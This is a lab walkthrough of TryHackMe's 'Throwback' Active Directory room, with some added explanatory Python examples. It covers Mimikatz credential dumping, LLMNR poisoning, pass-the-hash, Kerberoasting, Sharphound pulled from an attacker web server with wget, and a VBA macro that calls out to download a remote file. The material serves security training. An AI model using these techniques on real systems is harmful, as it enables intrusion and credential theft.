CTF-Writeups/TryHackMe/Throwback/Throwback.md
2021-03-16 22:27:06 +05:00


TryHackMe-Throwback

Introduction

What is Active Directory

Active Directory is a collection of machines and servers connected inside of domains, that are a collective part of a bigger forest of domains, that make up the Active Directory network. Active Directory contains many functioning bits and pieces, a majority of which we will be covering in the upcoming tasks. To outline what we'll be covering take a look over this list of Active Directory components and become familiar with the various pieces of Active Directory:

  • Domain Controllers
  • Forests, Trees, Domains
  • Users + Groups
  • Trusts
  • Policies
  • Domain Services

All of these parts of Active Directory come together to make a big network of machines and servers. Now that we know what Active Directory is, let's talk about the why.

Domain Controllers

A domain controller is a Windows server that has Active Directory Domain Services (AD DS) installed and has been promoted to a domain controller in the forest. Domain controllers are the center of Active Directory -- they control the rest of the domain. I will outline the tasks of a domain controller below: 

  • holds the AD DS data store
  • handles authentication and authorization services
  • replicates updates from other domain controllers in the forest
  • allows admin access to manage domain resources

AD DS Data Store

The Active Directory Data Store holds the databases and processes needed to store and manage directory information such as users, groups, and services. Below is an outline of some of the contents and characteristics of the AD DS Data Store:

  • Contains the NTDS.dit - a database that contains all of the information of an Active Directory domain controller as well as password hashes for domain users
  • Stored by default in %SystemRoot%\NTDS
  • accessible only by the domain controller

That is everything that you need to know in terms of physical and on-premise Active Directory. Now move on to learn about the software and infrastructure behind the network.

Forest Overview

A forest is a collection of one or more domain trees inside of an Active Directory network. It is what categorizes the parts of the network as a whole.

The forest consists of these parts, which we will go into further detail on later:

  • Trees - A hierarchy of domains in Active Directory Domain Services
  • Domains - Used to group and manage objects 
  • Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
  • Trusts - Allows users to access resources in other domains
  • Objects - users, groups, printers, computers, shares
  • Domain Services - DNS Server, LLMNR, IPv6
  • Domain Schema - Rules for object creation

Active Directory forest visualized

Users Overview

Users are the core to Active Directory; without users why have Active Directory in the first place? There are four main types of users you'll find in an Active Directory network; however, there can be more depending on how a company manages the permissions of its users. The four types of users are: 

  • Domain Admins - This is the big boss: they control the domains and are the only ones with access to the domain controller.
  • Service Accounts (Can be Domain Admins) - These are for the most part never used except for service maintenance; they are required by Windows for services such as SQL to pair a service with a service account
  • Local Administrators - These users can make changes to local machines as an administrator and may even be able to control other normal users, but they cannot access the domain controller
  • Domain Users - These are your everyday users. They can log in on the machines they have the authorization to access and may have local administrator rights to machines depending on the organization.

Domain Policies Overview

Policies are a very big part of Active Directory; they dictate how the server operates and what rules it will and will not follow. You can think of domain policies like domain groups, except instead of permissions they contain rules, and instead of only applying to a group of users, the policies apply to a domain as a whole. They simply act as a rulebook for Active Directory that a domain admin can modify and alter as they deem necessary to keep the network running smoothly and securely. Along with the very long list of default domain policies, domain admins can choose to add in their own policies not already on the domain controller. For example, if you wanted to disable Windows Defender across all machines on the domain you could create a new group policy object to disable Windows Defender. The options for domain policies are almost endless and are a big factor for attackers when enumerating an Active Directory network. I'll outline just a few of the many policies that are default or that you can create in an Active Directory environment:

  • Disable Windows Defender - Disables Windows Defender across all machines on the domain
  • Digitally Sign Communication (Always) - Can disable or enable SMB signing on the domain controller

Domain Services Overview

Domain Services are exactly what they sound like. They are services that the domain controller provides to the rest of the domain or tree. There is a wide range of various services that can be added to a domain controller; however, in this room we'll only be going over the default services that come when you set up a Windows server as a domain controller. Outlined below are the default domain services: 

  • LDAP - Lightweight Directory Access Protocol; provides communication between applications and directory services
  • Certificate Services - allows the domain controller to create, validate, and revoke public key certificates
  • DNS, LLMNR, NBT-NS - Domain Name Services for identifying IP hostnames

Domain Authentication Overview

The most important part of Active Directory -- as well as the most vulnerable part of Active Directory -- is the authentication protocols set in place. There are two main types of authentication in place for Active Directory: NTLM and Kerberos. Since these will be covered in more depth in later rooms we will not be covering past the very basics needed to understand how they apply to Active Directory as a whole. For more information on NTLM and Kerberos check out the Attacking Kerberos room - https://tryhackme.com/room/attackingkerberos.

  • Kerberos - The default authentication service for Active Directory uses ticket-granting tickets and service tickets to authenticate users and give users access to other resources across the domain.
  • NTLM - The default Windows authentication protocol; uses an encrypted challenge/response exchange

The Active Directory domain services are the main access point for attackers and contain some of the most vulnerable protocols for Active Directory; this will not be the last time you see them mentioned in terms of Active Directory security.

Introduction to Offensive Powershell

Well, we have all this information; now how can we apply it to attacking a Windows network? We can utilize offensive PowerShell to enumerate and attack Windows and Windows Active Directory.

Basic Offensive Powershell

A majority of offensive PowerShell will come from using modules like ActiveDirectory and PowerView to enumerate and exploit; however, PowerShell also has a few built-in cmdlets that you can use offensively.

Using Modules in Powershell

Powershell has the ability to import modules such as ActiveDirectory and PowerView to expand the list of cmdlets available. To import a module you can either use Import-Module module or you can use dot space dot backslash (. .\Module).

Examples of importing modules

    Import-Module Module

    . .\Module.ps1    

Note: . .\ will only work with PowerShell script files. All other modules will need to be imported with Import-Module; for example, ActiveDirectory can only be imported with Import-Module.

Get-ADDomain

Get-ADDomain is a cmdlet that pulls a large majority of the information about the domain you're attacking. It can list all of the Domain Controllers for a given environment, tell you the NetBIOS domain name, the FQDN (Fully Qualified Domain Name) and much more. Using the Select-Object command, we can filter out some of the unnecessary objects that may be displayed (like Containers, Group Policy Objects, and much more).

Get-ADDomain | Select-Object NetBIOSName, DNSRoot, InfrastructureMaster

Get-ADForest

Get-ADForest is another cmdlet that pulls all the domains within a forest and lists them out to the user. This may be useful if a bidirectional trust is set up, as it may allow you to gain a foothold in another domain on the LAN. Just like Get-ADDomain, there is a lot of output, so we will be using Select-Object to trim the output down.

Get-ADForest | Select-Object Domains

Get-ADTrust

Get-ADTrust is the last built-in PowerShell cmdlet that we will be discussing; after this, we will move over to PowerView. Get-ADTrust provides a ton of information about the trusts within the AD domain. It can tell you if it's a one-way or bidirectional trust, who the source is, who the target is, and much more. One required field is -Filter; this is required in the event that you want to filter on a specific domain/trust. If you do not (like in most circumstances), you can simply provide a * to wildcard the results.

Get-ADTrust -Filter * | Select-Object Direction,Source,Target

Introduction to PowerView

PowerView (part of PowerSploit by PowerShellMafia) is an excellent suite of tools that can be used for enumeration and exploitation of an AD domain. Today we're only going to cover PowerView's ability to enumerate information about the domain and its associated trusts; you can get the .ps1 here.

Get-NetDomain

Get-NetDomain is similar to the ActiveDirectory module's Get-ADDomain but contains a lot less information, which can be better. Basic info such as the forest, domain controllers, and domain name are enumerated.

Get-NetDomain

Get-NetDomainController

Get-NetDomainController is another useful cmdlet that will list all of the Domain Controllers within the network. This is incredibly useful for initial reconnaissance, especially if you do not have a Windows device that's joined to the domain.

Get-NetDomainController    

Get-NetForest

Get-NetForest is similar to Get-ADForest, and provides similar output. It provides all the associated Domains, the root domain, as well as the Domain Controllers for the root domain.

Get-NetForest    

Get-NetDomainTrust

Get-NetDomainTrust is similar to Get-ADTrust with our Select-Object filter applied to it. It's short, sweet and to the point!

Get-NetDomainTrust

LLMNR/NBT-NS Overview

To fully understand how the LLMNR poisoning attack works we first need to understand how LLMNR and NBT-NS work and why they are a part of Windows active directory. The Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows domain services that act as an alternative method for host identification. You can think of LLMNR like DNS: it allows hosts on the same network to use name resolution for other hosts. NBT-NS is used to identify systems on a network by their NetBIOS name.
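To see what LLMNR traffic actually looks like on the wire, here is an added Python example (not part of the original room) that builds and decodes an LLMNR query. LLMNR reuses the DNS message layout over UDP port 5355 to the multicast group 224.0.0.252; the summarize helper keys on exactly that destination, which is what a defender watching for hosts that fall back to LLMNR would look for. The hostname and IP addresses in the sample are constructed.

```python
import struct

# LLMNR (RFC 4795) reuses the DNS message layout, sent over UDP to the
# link-local multicast group below. A host only falls back to LLMNR after
# DNS fails to resolve a name, which is why a stray query on the wire is
# worth noticing.
LLMNR_MULTICAST_ADDR = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_NAMES = {1: "A", 28: "AAAA", 12: "PTR"}


def encode_name(name):
    """Encode a hostname as DNS-style length-prefixed labels."""
    out = b""
    for label in name.split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_llmnr_query(name, txid=0x1234, qtype=1):
    """Construct the UDP payload a host sends when it asks 'who is <name>?'
    via LLMNR. Used here only to produce sample input."""
    # ID, flags (QR=0 marks a query), QDCOUNT=1, ANCOUNT, NSCOUNT, ARCOUNT
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_llmnr(payload):
    """Decode an LLMNR message header and its first question."""
    if len(payload) < 12:
        raise ValueError("payload shorter than LLMNR header")
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", payload[:12])
    pos, labels = 12, []
    while True:
        length = payload[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:  # compression pointers are not valid in an LLMNR question
            raise ValueError("unexpected label compression")
        labels.append(payload[pos:pos + length].decode("ascii"))
        pos += length
    qtype, qclass = struct.unpack("!HH", payload[pos:pos + 4])
    return {
        "txid": txid,
        "is_response": bool(flags & 0x8000),  # QR bit
        "rcode": flags & 0x000F,
        "questions": qdcount,
        "answers": ancount,
        "name": ".".join(labels),
        "qtype": QTYPE_NAMES.get(qtype, str(qtype)),
        "qclass": qclass,
    }


def summarize(src_ip, dst_ip, dst_port, payload):
    """One-line triage of a captured datagram: who asked for which name.
    Returns None for traffic that is not LLMNR multicast."""
    if dst_ip != LLMNR_MULTICAST_ADDR or dst_port != LLMNR_PORT:
        return None
    msg = parse_llmnr(payload)
    kind = "response" if msg["is_response"] else "query"
    return f"{src_ip} LLMNR {kind} for {msg['name']!r} ({msg['qtype']})"


if __name__ == "__main__":
    # Constructed sample: a workstation mistyping a share name and falling back to LLMNR
    pkt = build_llmnr_query("fileservr")
    print(summarize("10.0.0.25", LLMNR_MULTICAST_ADDR, LLMNR_PORT, pkt))
```

Queries for names that should have resolved in DNS are the ones to investigate, since they are the requests a rogue responder on the segment can answer. Turning off LLMNR through the "Turn off multicast name resolution" group policy (Computer Configuration > Administrative Templates > Network > DNS Client) and disabling NetBIOS over TCP/IP on the adapters removes the fallback entirely.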

LLMNR Poisoning Overview

You can spoof the source for name resolution on a victim network using Responder, a tool that responds to LLMNR and NBT-NS requests as though it knows the identity of the requested host, "poisoning" the service so that victims communicate with our machine instead. If the requested host belongs to a resource that requires authentication, the user's name and their NTLMv2 hash will be sent to the attacker. These hashes can then be collected from Responder and taken offline to be cracked, then used to access the poisoned user's machines, or can be taken into PsExec to get a shell.

Mimikatz Overview

Mimikatz is one of the most famous tools used for dumping passwords on Windows systems. It can be used to dump passwords on both Windows Server and mainstream Windows versions. However, with its fame, its patterns are incredibly recognizable and are almost immediately picked up by all anti-virus or anti-malware services, so you must disable endpoint protection before attempting to use Mimikatz, or use an obfuscated version of Mimikatz with a C2. Mimikatz has many modules available and is being actively supported and updated. Here is the list of supported modules:

  • log
  • privilege
  • sekurlsa
  • lsadump
  • crypto
  • vault
  • token
  • misc
  • and many more

We will only be utilizing four of the modules for the lab, privilege, token, lsadump, and sekurlsa; however, mimikatz has a lot more modules and can be used more extensively.

Gaining Privilege

Once endpoint protection is disabled, you'll then be able to launch Mimikatz (with an Administrative Level User), you'll want to type privilege::debug which will then put you in Debug mode, a mode that can only be granted by an Administrator. From there, we will want to elevate privileges to NT Authority (if you don't have it already) with token::elevate. This will grant you the highest level access that Microsoft has to offer, which will allow you to do basically anything on the system. It's close to the Root user account in Linux.

1.) privilege::debug

2.) token::elevate

Checking privileges and elevating privileges with Mimikatz

Dumping Password Hashes

Mimikatz has a few options for dumping password hashes on non-DC endpoints; we'll only be covering a few of the many commands and modules Mimikatz has. Mimikatz has a general template syntax: most commands have the Mimikatz module first, followed by two colons, the command to be run, and any parameters that need to be specified at the end. For example:

lsadump::lsa /patch

  lsadump is the Mimikatz module itself
  lsa is the command within the module
  /patch is a specific parameter to patch something, in this case a particular DLL

sekurlsa::tickets /export

  sekurlsa is the Mimikatz module
  tickets is the command within the module
  /export is the parameter to export the tickets to the host

Dumping from LSA

The LSA (Local Security Authority) also handles credentials used by the system, everything from basic password changes to the creation of access tokens, so it's another ideal candidate for us to dump hashes from. The output is not as large as lsadump::lsa, which makes it much easier to work with.

1.) lsadump::lsa /patch    

Dumping SAM Hashes

The SAM (Security Account Manager) holds a copy of all the users' passwords, which makes it a valuable file for us to dump. The output can be convoluted and large, so you should transport it onto your Kali machine for further analysis.

1.) lsadump::sam

Dumping SAM hashes with mimikatz

Dumping Creds from Logged In Users

Another method of attacking lsass through Mimikatz is with the sekurlsa module. It will attempt to retrieve the credentials/hashes of currently logged-in users. This is the least preferred method for dumping credentials in Mimikatz.

1.) sekurlsa::logonPasswords

Pivoting Overview

In a good network, often referred to as a “Segmented Network”, there are certain rules in place preventing users from accessing certain parts of the internal LAN (ex. the Workstation subnet should not be able to access the Server subnet). This can be a headache for pentesters on occasion, as most networks are not segmented; those networks are referred to as “Flat Networks”. To make segmented networks behave more like flat networks there are proxying tools such as Proxychains or sshuttle which make it incredibly easy to pivot from one subnet in a LAN to another. Metasploit offers a proxy server as part of its post-exploitation tool suite, which will be covered below.

Introduction to Pivoting with proxychains

Auto-Routing our Traffic

To set up a proxy server you will need a meterpreter session or a reverse shell open in Metasploit beforehand. You can easily get a meterpreter shell by uploading a payload to the machine and executing it.

1.) background

2.) use post/multi/manage/autoroute

3.) set SESSION 1

4.) set SUBNET 10.200.x.0

Listing the configured options for autoroute

5.) exploit

Launching our new autoroute

Setting up our Proxy with Metasploit

1.) use auxiliary/server/socks4a

2.) (optional) Change your port; you can either keep the default 1080 port or change it to an open port of your choice.

Configuring and Using the Proxy Chain

1.) sudo nano /etc/proxychains.conf

You will need to comment out the socks4 proxy on 9050 which is a default proxy for tor and add the proxy chain we just created with the port that you gave when creating the proxies.

Adding our Socks4a server to the proxychains configuration file

2.) proxychains <command>    

You can now run any normal commands or tools that you want and it will be forwarded through the proxy chain if you append your tool or command with “proxychains”.

An example of running a command through proxy chains
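The configuration edit from step 1 above, written out as an added Python example (not from the room): it comments out the default Tor entry under [ProxyList] and appends the socks4 server Metasploit is listening on. SAMPLE_CONF is a constructed excerpt of a stock proxychains.conf; host, port and proxy type are parameters that default to 127.0.0.1:1080, matching the auxiliary/server/socks4a step.

```python
import re

# Constructed excerpt of a stock /etc/proxychains.conf; the real file has
# more comments and options above the [ProxyList] section.
SAMPLE_CONF = """\
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 \t127.0.0.1 9050
"""

# type host port, e.g. "socks4 127.0.0.1 1080"
ENTRY_RE = re.compile(r"^\s*(socks4|socks5|http)\s+(\S+)\s+(\d+)", re.IGNORECASE)


def active_proxies(conf_text):
    """Return (type, host, port) for every uncommented entry under [ProxyList].
    Handy as a check before running anything through proxychains."""
    found, in_list = [], False
    for line in conf_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("["):
            in_list = stripped.lower() == "[proxylist]"
            continue
        if not in_list or stripped.startswith("#"):
            continue
        m = ENTRY_RE.match(line)
        if m:
            found.append((m.group(1).lower(), m.group(2), int(m.group(3))))
    return found


def point_at_metasploit_socks(conf_text, host="127.0.0.1", port=1080, ptype="socks4"):
    """Comment out every active entry (the Tor default on 9050 in a stock
    file) and add the socks4a server started in Metasploit as the only proxy."""
    out, in_list = [], False
    for line in conf_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("["):
            in_list = stripped.lower() == "[proxylist]"
        elif in_list and not stripped.startswith("#") and ENTRY_RE.match(line):
            line = "# " + line  # disable the existing proxy line
        out.append(line)
    if not in_list:  # no [ProxyList] section seen at all
        out.append("[ProxyList]")
    out.append(f"{ptype} {host} {port}")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    updated = point_at_metasploit_socks(SAMPLE_CONF)
    print(updated)
    print("active:", active_proxies(updated))
```

To apply it to the real file, read /etc/proxychains.conf, pass the text through point_at_metasploit_socks and write the result back with sudo; active_proxies should then report exactly one entry, on the port you gave the socks4a module.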

Pivoting with proxychains

Pivoting may seem like a very big and scary thing but it is actually fairly simple after you have your proxy server set up. After setting up the proxy server you can pivot to any machines or resources that the proxy server has access to. For example, if you had a proxy server on example-ws01 and example-ws02 was segmented by a security group so that only example-ws01 had access, you could use your proxy server on example-ws01 to access example-ws02. You can use any way of accessing the machine that you usually would (ssh, rdp, WinRM, psexec); you just have to prepend the command with proxychains.

Examples of pivoting

  1.) proxychains ssh user@MACHINE_IP

  2.) proxychains xfreerdp /u:user /p:password /v:MACHINE_IP

  3.) proxychains evil-winrm -i MACHINE_IP -u user -p password

Setting up a Web Proxy with FoxyProxy

Now that we have a proxy set up to forward our traffic through, we need a way to easily access the resources on the network. Let's add an extension to our web browser to allow us to easily route our traffic through it! For this room, we'll be using 'FoxyProxy Standard' on Firefox. Navigate to the following link to install FoxyProxy Standard: Link

FoxyProxy Standard install card

1.) Click on FoxyProxy among your extensions. After that, click on 'Options', Then click on 'Add'.

FoxyProxy Options Panel

2.) Enter the following settings: you will need to fill in the title, proxy type (SOCKS4), proxy IP, and port, then click 'Save'.

FoxyProxy add proxy menu

3.) Click on FoxyProxy in your extensions and enable the web proxy.

FoxyProxy enable menu

Now that we have enumerated and attacked all initial vectors we can begin to collect the credentials that we have, as well as what footholds we have on the network, to see how we could move laterally throughout the network. The first thing to do when we have credentials but don't know what to do with them is to pass the hash with them. This checks each IP and validates the credentials. You will need to practice passing the hash with the hash you dumped in Task 20 as well as the hash from Task 10.

Pass the Hash Overview

Pass the hash (PtH) is an attack wherein we can leverage found NTLM or LanMan hashes of user passwords in order to successfully authenticate as the user they belong to. This is possible due to a well-intentioned security feature within Windows where passwords, prior to being sent over the network, are hashed in a predictable manner. Done originally with the intent of avoiding password disclosure, we can leverage this feature to capture and replay hashes, allowing us to authenticate as our victim users. In this section, we'll dig into this further with the tool crackmapexec.

Installing crackmapexec

1.) sudo apt install crackmapexec    

Note: We have received reports that the latest version of CrackMapExec segfaults, we recommend using a prior version like 5.0.2dev until further updates are released.

Crackmapexec help menu

Conquering Hashes with crackmapexec

1.) Configure proxychains to the proxy server that will be sending your requests. You will need a proxy server to pivot to the other machines and bypass segmentation. You can also utilize sshuttle as a proxy server to pivot.

2.) proxychains crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>    

Success! We got a hit passing the hash!

To continue on you can either use the hashes from mimikatz or cracked passwords from Task 10 to pass the hash then access the device(s). To access the device(s) you can either use the hashes with evil-winrm or you can attempt to crack the hashes and use ssh or rdp.

Enumeration with Bloodhound

Bloodhound is a graphical interface that allows you to visually map out the network using database visualization from neo4j. Bloodhound, along with Sharphound or any other Bloodhound ingestor, takes the users, groups, trusts and more of a domain, collects them into .json files and creates a graph database in neo4j to view information about the network.

We'll be focusing on how to collect the .json files and import them into Bloodhound, then make basic and custom queries in neo4j.

Bloodhound Installation

1.) sudo apt install bloodhound 

2.) neo4j console

default credentials:

    user:neo4j

    pass:neo4j    

Getting Loot with Sharphound

You will need to download Sharphound here. We suggest downloading the .ps1 script file.

From your host machine

1.) python3 -m http.server    

From the target device

2.) wget tun0_IP:8000/Sharphound.ps1 -outfile Sharphound.ps1    

3.) powershell -ep bypass

4.) . .\Sharphound.ps1

    or 

    Import-Module .\Sharphound.ps1    

5.) Invoke-Bloodhound -CollectionMethod All -Domain THROWBACK.local -ZipFileName loot.zip

Launching Sharphound to enumerate domain information

Mapping the Network with Bloodhound 

1.) scp loot.zip @10.200.x.222:/Users/Administrator/Downloads/loot.zip    

2.) sudo neo4j console

3.) bloodhound    

4.) Sign into Bloodhound using the same credentials you set with neo4j.

Bloodhound login panel

5.) In Bloodhound look for the 'upload data' icon / text and upload the json files / zip folder.

6.) To view the graphed network open the menu and select queries; this will give you a list of pre-compiled queries to choose from.

Selecting the 'Queries' sub-menu in Bloodhound

Bloodhound has many queries to utilize such as 'find all domain admins'.

Results of a query of domain admins

There are many pre-built queries to utilize that can help enumerate a domain.

Pre-built queries within Bloodhound
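To show what the pre-built queries actually compute, here is an added Python example (not part of the room, and not BloodHound's own code) over a tiny constructed graph that uses BloodHound's MemberOf, AdminTo and HasSession edge names. effective_members is the transitive lookup behind 'Find all Domain Admins', shortest_path is the breadth-first search behind the shortest-path queries, and kerberoastable lists users that carry an SPN (the Kerberoastable-accounts query mentioned in the next section). Every principal name, the EXAMPLE.LOCAL domain and every relationship here is invented.

```python
from collections import defaultdict, deque

# Constructed, simplified stand-in for what a BloodHound ingestor collects:
# principals with a few properties, and directed edges named as BloodHound
# names them. Every name and relationship here is invented for the example.
DOMAIN_ADMINS = "DOMAIN ADMINS@EXAMPLE.LOCAL"

NODES = {
    "ALICE@EXAMPLE.LOCAL": {"type": "User", "hasspn": False},
    "BOB@EXAMPLE.LOCAL": {"type": "User", "hasspn": False},
    "CAROL@EXAMPLE.LOCAL": {"type": "User", "hasspn": False},
    "SVC_SQL@EXAMPLE.LOCAL": {"type": "User", "hasspn": True},
    "HELPDESK@EXAMPLE.LOCAL": {"type": "Group"},
    "SERVER OPERATORS@EXAMPLE.LOCAL": {"type": "Group"},
    DOMAIN_ADMINS: {"type": "Group"},
    "WS01.EXAMPLE.LOCAL": {"type": "Computer"},
}

EDGES = [  # (source, relationship, target)
    ("ALICE@EXAMPLE.LOCAL", "MemberOf", "HELPDESK@EXAMPLE.LOCAL"),
    ("HELPDESK@EXAMPLE.LOCAL", "MemberOf", "SERVER OPERATORS@EXAMPLE.LOCAL"),
    ("BOB@EXAMPLE.LOCAL", "MemberOf", DOMAIN_ADMINS),
    ("SVC_SQL@EXAMPLE.LOCAL", "MemberOf", DOMAIN_ADMINS),
    ("CAROL@EXAMPLE.LOCAL", "AdminTo", "WS01.EXAMPLE.LOCAL"),
    ("WS01.EXAMPLE.LOCAL", "HasSession", "BOB@EXAMPLE.LOCAL"),  # BOB is logged on to WS01
]


def build_graph(edges):
    """Adjacency lists in both directions, keyed by node."""
    outgoing, incoming = defaultdict(list), defaultdict(list)
    for src, rel, dst in edges:
        outgoing[src].append((rel, dst))
        incoming[dst].append((rel, src))
    return outgoing, incoming


OUT, IN = build_graph(EDGES)


def effective_members(group):
    """Transitive membership through MemberOf edges: what 'Find all Domain
    Admins' resolves, including members inherited through nested groups."""
    seen, queue = set(), deque([group])
    while queue:
        current = queue.popleft()
        for rel, src in IN[current]:
            if rel == "MemberOf" and src not in seen:
                seen.add(src)
                queue.append(src)
    return seen


def shortest_path(start, target):
    """Breadth-first search over every edge type, i.e. the logic behind
    'Shortest Path to Domain Admins'. Returns a list of (node, relationship,
    node) hops, or None when no path exists."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            hops = []
            while prev[node] is not None:
                parent, rel = prev[node]
                hops.append((parent, rel, node))
                node = parent
            return list(reversed(hops))
        for rel, nxt in OUT[node]:
            if nxt not in prev:
                prev[nxt] = (node, rel)
                queue.append(nxt)
    return None


def kerberoastable():
    """Users with a registered SPN, i.e. 'Find all Kerberoastable accounts'."""
    return sorted(n for n, p in NODES.items() if p["type"] == "User" and p.get("hasspn"))


if __name__ == "__main__":
    print("Domain Admins:", sorted(effective_members(DOMAIN_ADMINS)))
    for hop in shortest_path("CAROL@EXAMPLE.LOCAL", DOMAIN_ADMINS) or []:
        print("  %s -[%s]-> %s" % hop)
    print("Kerberoastable:", kerberoastable())
```

The three-hop path CAROL -AdminTo-> WS01 -HasSession-> BOB -MemberOf-> DOMAIN ADMINS is the shape BloodHound draws most often: a local admin on a workstation where a privileged user has a session. For a blue team the same query answers "which workstations must never have a Domain Admin logged on", which is why the results are worth reviewing from both sides.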

Kerberoasting Overview

In this section, we'll be covering one of the most popular Kerberos attacks: Kerberoasting. Kerberoasting allows a user to request a service ticket for any service with a registered SPN, then use that ticket to crack the service password. If the service has a registered SPN then it can be Kerberoastable; however, the success of the attack depends on how strong the password is and whether it is crackable, as well as the privileges of the cracked service account. To enumerate Kerberoastable accounts, use BloodHound to find all Kerberoastable accounts; it will allow you to see what kind of accounts you can Kerberoast, whether they are domain admins, and what kind of connections they have to the rest of the domain.

Impacket Installation

Impacket releases have been unstable since 0.9.20; I suggest getting an installation of Impacket < 0.9.20.

1.) pip3 install impacket

2.) locate impacket

or

1.) cd /opt

2.) Download the precompiled package from https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19

3.) cd Impacket-0.9.19

4.) pip install .

Kerberoasting with Impacket

1.) cd /usr/share/doc/python3-impacket/examples

2.) proxychains sudo python3 GetUserSPNs.py -dc-ip 10.200.x.117 THROWBACK.local/user:password -request    

We can use any valid set of credentials on the workstation to Kerberoast with, for example HumphreyW's password from pfSense. If you don't have a valid set of credentials yet, you can also dump hashes with Mimikatz and attempt to crack them to get a valid set of credentials.

Sample Output from GetUserSPNs.py

Crack those Hashes with Hashcat

1.) hashcat -m 13100 -a 0 hash.txt rockyou.txt    

Sample KRB5TGS hash cracked with Hashcat
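To make the link between the GetUserSPNs.py output and hashcat mode 13100 concrete, here is an added Python example (not from Impacket or the room) that parses the $krb5tgs$23$ line format: user, realm and SPN between the asterisks, then the 16-byte checksum and the encrypted ticket, both as hex. SAMPLE_HASH is constructed from made-up hex, so it is not a real ticket and cannot be cracked; etype 17/18 lines (hashcat modes 19600/19700) use a different field layout and are rejected rather than misparsed.

```python
import re

# Constructed sample in the layout GetUserSPNs.py prints for an RC4 (etype 23)
# service ticket. The checksum and cipher text are made-up hex, not a real ticket.
SAMPLE_HASH = (
    "$krb5tgs$23$*svc_sql$EXAMPLE.LOCAL$MSSQLSvc/sql01.example.local:1433*$"
    + "0123456789abcdef0123456789abcdef$"
    + "deadbeef" * 16
)

# hashcat mode per Kerberos encryption type for TGS-REP hashes
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}
ETYPE_NAMES = {23: "RC4-HMAC", 17: "AES128-CTS-HMAC-SHA1-96", 18: "AES256-CTS-HMAC-SHA1-96"}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def parse_krb5tgs(line):
    """Split one $krb5tgs$23$ line into its named fields, validating the
    layout so a truncated or foreign line raises instead of returning junk."""
    parts = line.strip().split("$")
    if len(parts) < 4 or parts[0] != "" or parts[1] != "krb5tgs":
        raise ValueError("not a $krb5tgs$ hash")
    etype = int(parts[2])
    if etype != 23:
        # etype 17/18 lines use a different field layout; only RC4 is handled here
        raise ValueError(f"unsupported etype {etype} ({ETYPE_NAMES.get(etype, '?')})")
    if len(parts) != 8:
        raise ValueError("unexpected field count for an etype 23 hash")
    user, realm, spn = parts[3], parts[4], parts[5]
    if not user.startswith("*") or not spn.endswith("*"):
        raise ValueError("etype 23 hashes wrap user/realm/spn in asterisks")
    checksum, edata = parts[6], parts[7]
    if len(checksum) != 32 or not HEX_RE.match(checksum) or not HEX_RE.match(edata):
        raise ValueError("checksum must be 16 bytes of hex and edata must be hex")
    return {
        "etype": etype,
        "etype_name": ETYPE_NAMES[etype],
        "user": user[1:],
        "realm": realm,
        "spn": spn[:-1],
        "checksum": checksum.lower(),
        "edata_len": len(edata) // 2,  # size of the encrypted ticket in bytes
        "hashcat_mode": HASHCAT_MODES[etype],
    }


def triage(lines):
    """Group a dumped file by realm as (user, spn) pairs, skipping lines that
    do not parse. The same pass tells a defender which SPNs still sit on
    accounts that were issued RC4 tickets."""
    by_realm = {}
    for line in lines:
        try:
            rec = parse_krb5tgs(line)
        except ValueError:
            continue
        by_realm.setdefault(rec["realm"], []).append((rec["user"], rec["spn"]))
    return by_realm


if __name__ == "__main__":
    rec = parse_krb5tgs(SAMPLE_HASH)
    print(f"{rec['user']}@{rec['realm']} spn={rec['spn']} -> hashcat -m {rec['hashcat_mode']}")
    print(triage([SAMPLE_HASH, "not a hash"]))
```

An etype 23 line means the service account still accepts RC4; moving service accounts to AES-only with long, random passwords, or to group managed service accounts, is what takes the roast off the table, and Event ID 4769 entries with ticket encryption type 0x17 are where the requests show up on the domain controller.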

Malicious Macros Overview

Picture this: you are a manager for one of the top accounting firms in the United States. As you walk across the floor, you notice one thing in common: every device has the Microsoft Office suite installed. This shouldn't be any surprise to you; as reported in Microsoft's 2019 Annual Report, Office 365 (Commercial) has 180 million users. For an attacker, this is an extremely large attack surface. As an attacker, all you need to do is get one person to click on an Excel/Office document, and they could be the downfall of an organization.

Source: https://www.microsoft.com/investor/reports/ar19/index.html

Creating a Simple Macro

To start, you'll want to register an account with Microsoft, then download and install Office to your lab machine.

Note: You will need a Windows 10 machine for this portion of the lab. If you have a Windows 10 host you can utilize it, or you can spin up a local VM of Windows. Please do not use lab machines on the 10.200.0.0 subnet; this will ruin the lab experience for others.

After it is installed, start Excel, create a new workbook and head over to the “View” tab.

Microsoft Excel with the View Tab Open

There, you will find a section called “Macros”. Clicking the button will display a drop-down menu where you will have the option to create a new Macro. Click “Create New Macro” and you should see a new window open.

Microsoft Excel with the Macro Creation Window Open

You can name your new Macro whatever you like. It's important to know that later, the Macro name is not just an arbitrary value. It can add some additional functions and do some special things that will help us later. After entering a name for the Macro and clicking “Create” you should see a new window open that looks very different from Excel's normal interface.

Microsoft's Visual Basic Macro Editor

This is Microsoft's Visual Basic Macro Creator/Editor. This is where we will eventually create our malicious Macro. Here, we can write Visual Basic to perform actions, even execute OS commands. For example, we can use:

PID = Shell("powershell.exe -c Invoke-WebRequest -Uri https://192.168.125.1/shadow -OutFile C:\Shadow", vbNormalFocus)

This will connect out to a remote server and download the file “Shadow” and save it to the root of the file system as a file called “Shadow” (How creative).

A Python HTTP Server Listening with a Macro to Call Out to it

Let's say we wanted to step it up a notch and require the user to not interact with the Macro to trigger the remote connection to the HTTP Server, is this possible? If so, how can we do it?

